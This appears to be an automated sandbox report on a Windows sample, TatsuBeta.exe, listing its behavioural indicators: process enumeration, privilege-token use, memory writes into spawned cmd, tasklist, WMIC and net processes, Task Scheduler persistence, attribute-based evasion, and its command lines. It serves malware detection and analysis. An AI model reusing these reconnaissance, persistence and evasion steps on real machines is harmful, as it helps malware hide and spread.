N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3264 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 3264 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3252 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1704 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1704 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4424 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4596 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4596 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1620 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1620 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1208 wrote to memory of 1200 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1208 wrote to memory of 1200 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1724,7032267584485318978,5297624804189534909,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1952 --field-trial-handle=1724,7032267584485318978,5297624804189534909,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3264 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=3264 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

